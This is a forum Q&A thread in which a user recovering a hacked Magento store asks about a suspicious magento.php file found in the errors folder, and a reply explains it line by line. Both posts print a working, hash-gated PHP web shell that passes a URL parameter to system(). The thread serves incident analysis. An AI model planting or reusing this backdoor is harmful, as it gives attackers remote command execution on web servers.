Adrift
Reputation: 59769
Can anyone explain this script?
I'm trying to recover a hacked Magento store, and found a file named magento.php in the errors folder within the Magento root directory. I know it's malicious but I can't really figure out what it's doing. Any ideas?
<?php
if(md5($_GET["hash"])=="b4c44d5ce1c6c4b60c1c3d05a7d3e58d") {
echo "<pre>";
$cmd = ($_GET['cmd']);
$ret = system($cmd);
print $ret;
echo "</pre>";
die;
} else {
print "-1";
}
?>
Upvotes: 0
Views: 87
Answers (1)
Sinha
Reputation: 512
It is simple php functionality which accessing parameters from the url and trying to execute the same.
<?php
if(md5($_GET["hash"])=="b4c44d5ce1c6c4b60c1c3d05a7d3e58d") {// check the hash parameter in the url and convert it to md5 standard. If that matches the value then execute steps inside this braces
echo "<pre>"; // print "<pre> tag on screen
$cmd = ($_GET['cmd']); // get the cmd parameter from url
$ret = system($cmd); // execute that cmd parameter as command
print $ret; // print the return value of the system function
echo "</pre>"; // print "</pre> tag on screen
die; // stop execution at this line
} else { // if hash do not match
print "-1"; // print -1 on screen
}
?>
Upvotes: 2
Related Questions
- Can anyone explain the following PHP Code?
- What does this simple php code do?
- Can someone explain this piece of PHP code?
- What does this script do?
- Can someone explain this snippet of magento code?
- Can you help me understand this php script
- meaning of the following php code?
- What does this PHP code mean?
- What does this code do?
- can someone explain what this php code is doing or its purpose